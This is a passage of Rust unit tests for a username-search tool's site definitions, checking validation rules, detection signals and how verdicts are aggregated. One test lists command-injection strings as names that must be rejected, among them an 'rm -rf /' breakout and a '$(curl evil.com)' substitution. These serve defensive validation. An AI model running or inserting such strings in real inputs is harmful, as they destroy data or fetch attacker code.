888    fn url_template_rejects_missing_placeholder() {
889        assert!(UrlTemplate::new("https://example.com/users/").is_err());
890    }
891
892    #[test]
893    fn url_template_rejects_bad_scheme() {
894        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
895    }
896
897    #[test]
898    fn validate_requires_non_empty_signals() {
899        let err = site_with(vec![]).validate().unwrap_err();
900        assert!(err.to_string().contains("signals list is empty"));
901    }
902
903    #[test]
904    fn validate_rejects_empty_status_codes() {
905        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
906            .validate()
907            .unwrap_err();
908        assert!(err.to_string().contains("status signal"));
909    }
910
911    #[test]
912    fn validate_rejects_empty_body_text() {
913        let err = site_with(vec![Signal::BodyAbsent {
914            text: String::new(),
915        }])
916        .validate()
917        .unwrap_err();
918        assert!(err.to_string().contains("body signal"));
919    }
920
921    #[test]
922    fn validate_rejects_bad_body_username_marker() {
923        let err = site_with(vec![Signal::BodyUsername {
924            text: String::new(),
925        }])
926        .validate()
927        .unwrap_err();
928        assert!(err.to_string().contains("body username signal"));
929
930        let err = site_with(vec![Signal::BodyUsername {
931            text: "username".into(),
932        }])
933        .validate()
934        .unwrap_err();
935        assert!(err.to_string().contains("missing {username} placeholder"));
936    }
937
938    #[test]
939    fn validate_rejects_empty_redirect_fragment() {
940        let err = site_with(vec![Signal::RedirectAbsent {
941            fragment: String::new(),
942        }])
943        .validate()
944        .unwrap_err();
945        assert!(err.to_string().contains("redirect signal"));
946    }
947
948    #[test]
949    fn validate_rejects_shell_metacharacters_in_name() {
950        // The validate-sites.yml workflow used to inject `--only "$name"`
951        // where `$name` came from PR-controlled sites.json. A name like
952        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
953        // and executed on the runner. Schema + this loader both enforce
954        // a safe character class; verify a representative selection of
955        // dangerous chars is rejected.
956        for bad in [
957            "Foo\"; rm -rf /; #",
958            "Bar$(curl evil.com)",
959            "Baz`whoami`",
960            "Qux\\nfoo",
961            "back\\slash",
962            "pipe|ish",
963            "semi;colon",
964            "amp&and",
965            "lt<gt>",
966        ] {
967            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
968            s.name = bad.into();
969            let err = s.validate().unwrap_err();
970            assert!(
971                err.to_string()
972                    .contains("characters outside the allowed set"),
973                "expected unsafe-name rejection for {bad:?}, got {err}",
974            );
975        }
976    }
977
978    #[test]
979    fn validate_accepts_real_world_site_names() {
980        // Cross-check the validation against names we actually ship.
981        for ok in [
982            "GitHub",
983            "Steam Community (User)",
984            "X / Twitter",
985            "osu!",
986            "Eintracht Frankfurt Forum",
987            "Archive of Our Own",
988            "Career.habr",
989            "fl",
990            "GitLab.com",
991            "Sbazar.cz",
992        ] {
993            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
994            s.name = ok.into();
995            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
996        }
997    }
998
999    #[test]
1000    fn validate_rejects_overlong_name() {
1001        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
1002        s.name = "A".repeat(100);
1003        let err = s.validate().unwrap_err();
1004        assert!(err.to_string().contains("longer than"));
1005    }
1006
1007    #[test]
1008    fn validate_accepts_well_formed_regex_check() {
1009        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
1010        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
1011        assert!(s.validate().is_ok());
1012    }
1013
1014    #[test]
1015    fn validate_tolerates_unsupported_regex_features() {
1016        // Sherlock-imported regexes occasionally use lookarounds
1017        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
1018        // those sites should still load, with the username-gate
1019        // silently disabled rather than rejecting the whole site.
1020        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
1021        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
1022        assert!(
1023            s.validate().is_ok(),
1024            "lookaround-bearing regex should warn, not reject the site"
1025        );
1026    }
1027
1028    #[test]
1029    fn signal_status_found_votes_only_on_match() {
1030        let signal = Signal::StatusFound { codes: vec![200] };
1031        let probe = Probe {
1032            status: 200,
1033            final_url: "https://example.com/alice",
1034            body: "",
1035            username: "alice",
1036        };
1037        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
1038        let probe = Probe {
1039            status: 404,
1040            ..probe
1041        };
1042        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1043    }
1044
1045    #[test]
1046    fn signal_status_not_found_votes_only_on_match() {
1047        let signal = Signal::StatusNotFound { codes: vec![404] };
1048        let probe = Probe {
1049            status: 404,
1050            final_url: "",
1051            body: "",
1052            username: "alice",
1053        };
1054        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
1055        let probe = Probe {
1056            status: 200,
1057            ..probe
1058        };
1059        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1060    }
1061
1062    #[test]
1063    fn signal_body_absent_votes_not_found_when_text_present() {
1064        let signal = Signal::BodyAbsent {
1065            text: "Profile not found".into(),
1066        };
1067        let probe = Probe {
1068            status: 200,
1069            final_url: "",
1070            body: "<h1>Profile not found</h1>",
1071            username: "alice",
1072        };
1073        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
1074        let probe = Probe {
1075            body: "<h1>Welcome alice</h1>",
1076            ..probe
1077        };
1078        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1079    }
1080
1081    #[test]
1082    fn signal_body_username_votes_found_only_for_rendered_username() {
1083        let signal = Signal::BodyUsername {
1084            text: r#""username":"{username}""#.into(),
1085        };
1086        let probe = Probe {
1087            status: 200,
1088            final_url: "",
1089            body: r#"{"username":"johndoe"}"#,
1090            username: "johndoe",
1091        };
1092        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
1093
1094        let probe = Probe {
1095            username: "john.doe",
1096            ..probe
1097        };
1098        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1099    }
1100
1101    #[test]
1102    fn generic_body_present_does_not_confirm_username() {
1103        assert!(
1104            !Signal::BodyPresent {
1105                text: "username".into()
1106            }
1107            .confirms_username()
1108        );
1109        assert!(
1110            Signal::BodyUsername {
1111                text: "{username}".into()
1112            }
1113            .confirms_username()
1114        );
1115    }
1116
1117    #[test]
1118    fn signal_redirect_absent_inspects_final_url() {
1119        let signal = Signal::RedirectAbsent {
1120            fragment: "/login".into(),
1121        };
1122        let probe = Probe {
1123            status: 200,
1124            final_url: "https://example.com/login?next=/alice",
1125            body: "",
1126            username: "alice",
1127        };
1128        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
1129        let probe = Probe {
1130            final_url: "https://example.com/alice",
1131            ..probe
1132        };
1133        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1134    }
1135
1136    #[test]
1137    fn aggregate_found_when_only_found_signals_fire() {
1138        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
1139        assert_eq!(kind, MatchKind::Found);
1140    }
1141
1142    #[test]
1143    fn aggregate_not_found_when_only_not_found_signals_fire() {
1144        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
1145        assert_eq!(kind, MatchKind::NotFound);
1146    }
1147
1148    #[test]
1149    fn aggregate_not_found_wins_over_found() {
1150        // Negative-priority: a NotFound vote outranks a Found vote.
1151        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
1152        assert_eq!(kind, MatchKind::NotFound);
1153    }
1154
1155    #[test]
1156    fn aggregate_uncertain_when_no_signals_fire() {
1157        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
1158        assert_eq!(kind, MatchKind::Uncertain);
1159    }
1160
1161    #[test]
1162    fn aggregate_empty_is_uncertain() {
1163        let kind = aggregate(std::iter::empty());
1164        assert_eq!(kind, MatchKind::Uncertain);
1165    }
1166
1167    #[test]
1168    fn needs_body_is_true_only_for_body_signals() {
1169        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
1170        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
1171        assert!(
1172            !Signal::RedirectAbsent {
1173                fragment: "/login".into()
1174            }
1175            .needs_body()
1176        );
1177        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
1178        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
1179    }
1180
1181    #[test]
1182    fn deserializes_signal_list() {
1183        let json = r#"{
1184            "name": "GitHub",
1185            "url": "https://github.com/{username}",
1186            "signals": [
1187                { "kind": "status_found", "codes": [200] },
1188                { "kind": "status_not_found", "codes": [404] }
1189            ]
1190        }"#;
1191        let site: Site = serde_json::from_str(json).unwrap();
1192        assert_eq!(site.name, "GitHub");
1193        assert_eq!(site.signals.len(), 2);
1194        site.validate().unwrap();
1195    }
1196
1197    proptest::proptest! {
1198        /// For any mix of per-signal verdicts, aggregation obeys the
1199        /// negative-priority spec: any NotFound wins; else any Found; else
1200        /// Uncertain.
1201        #[test]
1202        fn aggregate_matches_negative_priority_spec(
1203            votes in proptest::collection::vec(
1204                proptest::prop_oneof![
1205                    proptest::strategy::Just(SignalVerdict::Found),
1206                    proptest::strategy::Just(SignalVerdict::NotFound),
1207                    proptest::strategy::Just(SignalVerdict::Ambiguous),
1208                ],
1209                0..16,
1210            ),
1211        ) {
1212            let kind = aggregate(votes.iter().copied());
1213            let expected = if votes.contains(&SignalVerdict::NotFound) {
1214                MatchKind::NotFound
1215            } else if votes.contains(&SignalVerdict::Found) {
1216                MatchKind::Found
1217            } else {
1218                MatchKind::Uncertain
1219            };
1220            proptest::prop_assert_eq!(kind, expected);
1221        }
1222    }
1223}